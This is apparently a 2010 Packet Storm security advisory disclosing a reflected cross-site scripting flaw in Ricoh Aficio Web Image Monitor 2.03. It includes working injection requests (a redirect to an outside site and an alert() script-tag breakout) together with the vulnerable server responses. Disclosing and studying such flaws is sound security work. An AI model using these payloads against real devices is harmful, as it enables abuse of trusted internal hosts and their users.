Ricoh Aficio Web Image Monitor 2.03 Cross Site Scripting

2010-11-11T00:00:00
ID PACKETSTORM:95729
Type packetstorm
Reporter The Light Cosine
Modified 2010-11-11T00:00:00

Description

                                        
                                            `I was poking at some Ricoh MFPs several days ago, when I found this. It is  
nothing to get to terribly excited about as it's just a reflected XSS.  
However, the ability to abuse any trusted internal IP should be considered a  
threat. Companies have taken big hits from less. So without further ado,  
here are the petty little details:  
  
  
Tested successfully on numerous different Ricoh Aficio models, all running  
v2.03 of the Web Image Monitor interface. Responses included below are html  
encoded for your protection.  
  
Fun with Redirects:  
  
My inital test was just an abuse of the redirect functionality that is being  
exploited for the vector.  
  
GET /?";location.href="http://cosine-security.blogspot.com HTTP/1.1  
  
  
HTTP/1.0 200 OK  
  
Date: Tue, 09 Nov 2010 17:58:00 GMT  
  
Server: Web-Server/3.0  
  
Content-Type: text/html; charset=UTF-8  
  
Content-Length: 683  
  
Expires: Tue, 09 Nov 2010 17:58:00 GMT  
  
Pragma: no-cache  
  
Cache-Control: no-cache  
  
Set-Cookie: cookieOnOffChecker=on; path=/  
  
Connection: close  
  
  
<html><head>  
  
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">  
  
<meta http-equiv="refresh" content="1;  
URL=/web/guest/en/websys/webArch/message.cgi?messageID=MSG_JAVASCRIPTOFF&buttonURL=/../../../">  
  
<meta http-equiv="Cache-Control" content="no-cache">  
  
<meta http-equiv="Pragma" content="no-cache">  
  
<meta http-equiv="Expires" content="-1">  
  
<title>Web Image Monitor</title>  
  
<script language="javascript">  
  
<!--  
  
function jumpPage(){  
  
self.document.cookie="cookieOnOffChecker=on; path=/";  
  
location.href="/web/guest/en/websys/webArch/mainFrame.cgi?";location.href="  
http://cosine-security.blogspot.com";  
  
}  
  
// -->  
  
</script>  
  
</head>  
  
<body onLoad="jumpPage()"></body>  
  
</html>  
  
  
  
A more traditional XSS test will still work just as well of course:  
  
  
Traditional Test:  
  
GET /?--></script><script>alert(51494)</script>  
HTTP/1.1  
  
  
  
HTTP/1.0 200 OK  
  
Date: Fri, 29 Oct 2010 17:43:19 GMT  
  
Server: Web-Server/3.0  
  
Content-Type: text/html; charset=UTF-8  
  
Content-Length: 672  
  
Expires: Fri, 29 Oct 2010 17:43:19 GMT  
  
Pragma: no-cache  
  
Cache-Control: no-cache  
  
Set-Cookie: cookieOnOffChecker=on; path=/  
  
Connection: close  
  
  
<html><head>  
  
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">  
  
<meta http-equiv="refresh" content="1;  
URL=/web/guest/en/websys/webArch/message.cgi?messageID=MSG_JAVASCRIPTOFF&buttonURL=/../../../">  
  
<meta http-equiv="Cache-Control" content="no-cache">  
  
<meta http-equiv="Pragma" content="no-cache">  
  
<meta http-equiv="Expires" content="-1">  
  
<title>Web Image Monitor</title>  
  
<script language="javascript">  
  
<!--  
  
function jumpPage(){  
  
self.document.cookie="cookieOnOffChecker=on; path=/";  
  
location.href="/web/guest/en/websys/webArch/mainFrame.cgi?--></script><script>alert(51494)</script>";  
  
}  
  
// -->  
  
</script>  
  
</head>  
  
<body onLoad="jumpPage()"></body>  
  
  
The same writeup, including a screenshot, can be found at  
http://cosine-security.blogspot.com/2010/11/ricoh-web-image-monitor-203-reflected.html  
`